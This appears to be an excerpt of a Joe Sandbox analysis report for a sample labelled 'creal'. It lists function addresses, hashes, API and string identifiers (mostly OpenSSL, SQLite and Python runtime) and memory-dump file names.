                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_lib.c$SSL_do_handshake
                                                                                                                                                                                                                • API String ID: 2134390360-2964568172
                                                                                                                                                                                                                • Opcode ID: 46602194f778fa2614cb91244c54d281bde36e84fac3cc3955deca6444a68e60
                                                                                                                                                                                                                • Instruction ID: e46ee42fa72c237e09cf8766e1c3314cace587659e00d5a216ba62f5605a0439
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46602194f778fa2614cb91244c54d281bde36e84fac3cc3955deca6444a68e60
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4621C162B08B4282EB54EBB5F4413BD2351FF887C4F590235EE6D42786EF3CE5818602
                                                                                                                                                                                                                Function 00007FF8E68C0250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$CreateFile
                                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                • API String ID: 333288564-3829269058
                                                                                                                                                                                                                • Opcode ID: 47d229aef933e0d59dc5dcf9258cd0e2023164957fffc33a8fb9dfcd5c4bd0d1
                                                                                                                                                                                                                • Instruction ID: d0ad79830e8de96b09236ce9bc81cd401084ae81ed678347013d45398ffd5899
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47d229aef933e0d59dc5dcf9258cd0e2023164957fffc33a8fb9dfcd5c4bd0d1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A202DD21F2DB5296FAA48FA5E85177963A0FF89BD4F040234DE4E426A1DF3DE4848743
                                                                                                                                                                                                                Function 00007FF8E68E7E80 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 139COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                • API String ID: 3510742995-3712603878
                                                                                                                                                                                                                • Opcode ID: bd5a30be7f2f2b4ec66f19732ede60e8cd1cfc78c1b4ac1a2368ec9ef04a4963
                                                                                                                                                                                                                • Instruction ID: b43a8d51e6847e19b516d707b09f56d7ae4094b28e6467340f6f65753d0f3092
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd5a30be7f2f2b4ec66f19732ede60e8cd1cfc78c1b4ac1a2368ec9ef04a4963
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E451BF76F2EAA295FB149BE598503B86B91AF41BE0F084131DE9D477D9DE3CE841C302
                                                                                                                                                                                                                Function 00007FF8E7004290 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocEval_Thread$RestoreSavesqlite3_close_v2sqlite3_get_autocommit
                                                                                                                                                                                                                • String ID: ROLLBACK
                                                                                                                                                                                                                • API String ID: 3097044782-1608819330
                                                                                                                                                                                                                • Opcode ID: ad3cbcdeca86c3c26188f54a70d136120957feaaf2e1a7049174d51e02bd1bc6
                                                                                                                                                                                                                • Instruction ID: def083fa04848628c737175d95e2acf7f886cc5504fdbf6c7400446b2e420634
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad3cbcdeca86c3c26188f54a70d136120957feaaf2e1a7049174d51e02bd1bc6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B213B21A18B4281EE149FA1E45033D22A4FF47BF4F141931EE6ED6799DF3CE8529706
                                                                                                                                                                                                                Function 00007FF8E7008F9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1578819031.00007FF8E7001000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF8E7000000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578774051.00007FF8E7000000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578915505.00007FF8E7019000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1578958590.00007FF8E701B000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7000000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                • String ID: argument 1$execute$str
                                                                                                                                                                                                                • API String ID: 3876575403-3433703408
                                                                                                                                                                                                                • Opcode ID: 9ffb5c577ef406221f0b3c5c368f3fea7fc6aa555937727b7af1d9de80cfe3ec
                                                                                                                                                                                                                • Instruction ID: bc03057d9b0889beccc7737e9d365b0fd97cb21ba89724f087a0560a4c8556d7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ffb5c577ef406221f0b3c5c368f3fea7fc6aa555937727b7af1d9de80cfe3ec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC118631A0C686C5EE10DB92E4403AE6360FB46FD0F588432EEAD93B55DF6CE655C741
                                                                                                                                                                                                                Function 00007FF8E68C9E80 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 174COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 0-3418467682
                                                                                                                                                                                                                • Opcode ID: 70763ae1427885678d87873981513cb12e4759df12c4f2b9939fb91df184ef28
                                                                                                                                                                                                                • Instruction ID: 54555ea13dd0593b7df595bd0e5fa6e3dc64eadb9288ba6567590af914541007
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70763ae1427885678d87873981513cb12e4759df12c4f2b9939fb91df184ef28
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2719C62B28A62E6FB609B96E44037973A1FB94BC4F184031DA4D476A5DF7DE842C303
                                                                                                                                                                                                                Function 00007FF8E71F7A00 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: J_nid2snR_fetchR_pop_to_markR_set_mark
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2772354928-0
                                                                                                                                                                                                                • Opcode ID: 3376d8211a2ed54d93c11fa2622649ee14bde3fed94f08393f8e637d559c63eb
                                                                                                                                                                                                                • Instruction ID: f8d5f7f6965564b724afedf3a033bbf90d857c02298247aaf196a66523dd69d1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3376d8211a2ed54d93c11fa2622649ee14bde3fed94f08393f8e637d559c63eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55F08C00B0938102EA44B7E2F8413BD9551AF88BC0F095035FF6E47B8BEE2CE9410602
                                                                                                                                                                                                                Function 00007FF8E71D1E01 Relevance: 4.6, APIs: 3, Instructions: 87COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastM_freeR_clear_error
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1231514297-0
                                                                                                                                                                                                                • Opcode ID: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
                                                                                                                                                                                                                • Instruction ID: f8daed0640c6fb4cea38ee89de55bbed5b216d30700ec67d1d279437c78cddef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D318E32E0828286F7649EA6D44437D7395EB45BC4F588431DE3E47689DF3DE882D742
                                                                                                                                                                                                                Function 00007FF8E715252E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 3617616757-217463007
                                                                                                                                                                                                                • Opcode ID: 3d0b5fe31bdceefd0d16471987016516823057e139ed2a49c540c935358a7bd8
                                                                                                                                                                                                                • Instruction ID: f3b0e652de1fc70c29de0226f67ddcea6736e5f31e0f221cc37715601249bd55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d0b5fe31bdceefd0d16471987016516823057e139ed2a49c540c935358a7bd8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5F03AA6E0DB8391FA1D9FC5E8112BC23616F40BE1B844035CD2D172A0DF2CB5458742
                                                                                                                                                                                                                Function 00007FF8E71DF3F0 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1580599471.00007FF8E71D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF8E71D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580559886.00007FF8E71D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580599471.00007FF8E7253000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581118655.00007FF8E727D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7282000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7288000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1581212869.00007FF8E7290000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e71d0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                • Opcode ID: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
                                                                                                                                                                                                                • Instruction ID: 254cebb4e87be2bfddd61940087b4676263000dd1e1d29d380186263f08efe45
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7219C32608B8087E354DB62E98066EB3A5FB88BD4F144135EBA847F99CF3CE155CB01

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Function 00007FF8E69710E0 Relevance: 20.0, APIs: 2, Strings: 11, Instructions: 456COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcmpmemcpy
                                                                                                                                                                                                                • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                • API String ID: 1784268899-1330295256
                                                                                                                                                                                                                • Opcode ID: 907b28649db16cb4e34c3c63b369c0bd186525c883081c61b9df2ed961016c95
                                                                                                                                                                                                                • Instruction ID: 2438c829f63bc372d9b7e99802acb184d644d626d590b0ee7e6b5a336e699405
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 907b28649db16cb4e34c3c63b369c0bd186525c883081c61b9df2ed961016c95
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51020262E2C28246FB75ABA1904C3796B91AB52BF4F1C4235CE9E476C1DE3DF5478302
                                                                                                                                                                                                                Function 00007FF8E6FB1960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577473923.00007FF8E6FB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF8E6FB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577410915.00007FF8E6FB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577517217.00007FF8E6FB2000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577555444.00007FF8E6FB4000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fb0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                • Opcode ID: 7e91f6bfd96c29140b0d269c20ca028c10e388d05116ed94df9161a84ec9e0c7
                                                                                                                                                                                                                • Instruction ID: fd9a94f6f2fd7f86e641e0f67d2d74671f7a9a1763a52bf57052a703908406f0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e91f6bfd96c29140b0d269c20ca028c10e388d05116ed94df9161a84ec9e0c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD314A72618B868AEB60DFA0E8547FD7365FB84784F48443ADA4E47A98DF3CD648C710
                                                                                                                                                                                                                Function 00007FF8E6F31960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575627628.00007FF8E6F31000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8E6F30000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575586394.00007FF8E6F30000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575707674.00007FF8E6F33000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575751750.00007FF8E6F35000.00000002.00000001.01000000.00000029.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6f30000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                • Opcode ID: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
                                                                                                                                                                                                                • Instruction ID: 0d9d18cf7f5908522c3fc525d3b57d0d0a55c891626e5281f9a623c048900b41
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44314D72659A86C9EB60CFA0E8547ED7360FB94788F44503ADA4D47A98DF3CD648C710
                                                                                                                                                                                                                Function 00007FF8E6FC1960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1577634657.00007FF8E6FC1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF8E6FC0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577585028.00007FF8E6FC0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577691044.00007FF8E6FC3000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577732223.00007FF8E6FC4000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1577775069.00007FF8E6FC5000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6fc0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                • Opcode ID: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
                                                                                                                                                                                                                • Instruction ID: 0fc374b33a702f4bbf7b39e32c6aaeb52f98611fdd47102596c212dd1ba57175
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab57132a56a43adcf6d314196c4535093efc661be566aed9b6740bd42d3de9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9315A73618A859AEB60DFA0E8403E97360FB94788F44403ADA4E47B98DF3CD658C708
                                                                                                                                                                                                                Function 00007FF8E6F11960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1575166000.00007FF8E6F11000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FF8E6F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575122286.00007FF8E6F10000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575218759.00007FF8E6F16000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1575264792.00007FF8E6F1B000.00000002.00000001.01000000.0000002B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e6f10000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 313767242-0
                                                                                                                                                                                                                • Opcode ID: b1f9e4b8cb76c58f9ad273c7ab6db637e490d5b196a1216b4705d07cf26add3e
                                                                                                                                                                                                                • Instruction ID: 8a862b18dc4412c2a84dfcdf49d8f5d6d3312fc8f79617a856f7132afb48b9c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1f9e4b8cb76c58f9ad273c7ab6db637e490d5b196a1216b4705d07cf26add3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1314C72618A868AEB60CFA0E8547ED7360FB84784F44403ADA4E47A9ADF3CD648C710
                                                                                                                                                                                                                Function 00007FF8E71542E8 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
